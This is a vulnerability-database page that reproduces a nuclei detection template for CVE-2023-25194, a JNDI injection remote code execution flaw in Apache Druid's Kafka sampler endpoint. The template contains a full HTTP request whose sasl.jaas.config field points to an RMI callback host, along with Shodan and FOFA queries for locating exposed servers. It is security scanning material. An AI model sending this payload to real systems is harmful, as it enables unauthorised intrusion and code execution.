Lucene search
K

Apache Druid Kafka Connect - Remote Code Execution

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 111 Views

Apache Druid Kafka Connect - Remote Code Execution vulnerability with unsafe deserialization during configuration, allowing remote code execution

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Apache Druid JNDI Injection Remote Code Execution Exploit
27 Jun 202300:00
zdt
IBM Security Bulletins
Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities
7 Mar 202303:26
ibm
IBM Security Bulletins
Security Bulletin: There is a vulnerability in kafka-clients-2.8.2.jar used by IBM Maximo Manage application in IBM Maximo Application Suite (CVE-2023-25194)
1 Feb 202413:37
ibm
IBM Security Bulletins
Security Bulletin: z/Transaction Processing Facility is affected by vulnerabilities in the Apache Kafka (kafka-clients) and cryptography packages
9 Mar 202314:08
ibm
IBM Security Bulletins
Security Bulletin: IBM QRadar SIEM includes components with known vulnerabilities
6 Jul 202318:48
ibm
IBM Security Bulletins
Security Bulletin: IBM InfoSphere Information Server is affected but not classified as vulnerable to a code execution vulnerability in Apache Kafka (CVE-2023-25194)
17 May 202321:22
ibm
IBM Security Bulletins
Security Bulletin: IBM webMethods BPM is vulnerable to a denial of service due to kafka-clients
17 Feb 202604:39
ibm
IBM Security Bulletins
Security Bulletin: Security vulnerabilities are addressed with IBM Cloud Pak for Business Automation iFixes for March 2023
1 Apr 202314:09
ibm
IBM Security Bulletins
Security Bulletin: Multiple Vulnerabilities in IBM Operator for Apache Flink
30 Dec 202513:32
ibm
IBM Security Bulletins
Security Bulletin: There is a vulnerability in kafka-clients-2.8.2.jar used by IBM Maximo Asset Management application (CVE-2023-25194)
1 Feb 202413:36
ibm
Rows per page
id: CVE-2023-25194

info:
  name: Apache Druid Kafka Connect - Remote Code Execution
  author: j4vaovo
  severity: high
  description: |
    The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API
  impact: |
    Authenticated attackers can exploit unsafe deserialization in the Kafka Connect REST API to execute arbitrary code through JNDI injection, potentially compromising the entire Apache Druid data analytics infrastructure.
  remediation: |
    Apply Apache Druid security patches that validate and sanitize SASL JAAS configuration in Kafka connector settings to prevent JNDI injection attacks.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25194
    - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce
    - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html
    - https://kafka.apache.org/cve-list
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-25194
    cwe-id: CWE-502
    epss-score: 0.95302
    epss-percentile: 0.99856
    cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: kafka_connect
    shodan-query:
      - html:"Apache Druid"
      - http.html:"apache druid"
    fofa-query: body="apache druid"
  tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast,vkev,vuln

http:
  - raw:
      - |
        POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "type":"kafka",
            "spec":{
                "type":"kafka",
                "ioConfig":{
                    "type":"kafka",
                    "consumerProperties":{
                        "bootstrap.servers":"127.0.0.1:6666",
                        "sasl.mechanism":"SCRAM-SHA-256",
                        "security.protocol":"SASL_SSL",
                        "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
                    },
                    "topic":"test",
                    "useEarliestOffset":true,
                    "inputFormat":{
                        "type":"regex",
                        "pattern":"([\\s\\S]*)",
                        "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                        "columns":[
                            "raw"
                        ]
                    }
                },
                "dataSchema":{
                    "dataSource":"sample",
                    "timestampSpec":{
                        "column":"!!!_no_such_column_!!!",
                        "missingValue":"1970-01-01T00:00:00Z"
                    },
                    "dimensionsSpec":{

                    },
                    "granularitySpec":{
                        "rollup":false
                    }
                },
                "tuningConfig":{
                    "type":"kafka"
                }
            },
            "samplerConfig":{
                "numRows":500,
                "timeoutMs":15000
            }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'RecordSupplier'

      - type: status
        status:
          - 400
# digest: 4a0a0047304502200d7d203d2968a565f2294db6dec9474ee53d30e049e8ba92899b538e550d46bf022100bb7ceccb309befba09813e864c84824569f9a04c0697dcc10062d4429a062318:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 3.18.8
EPSS0.95302
SSVC
111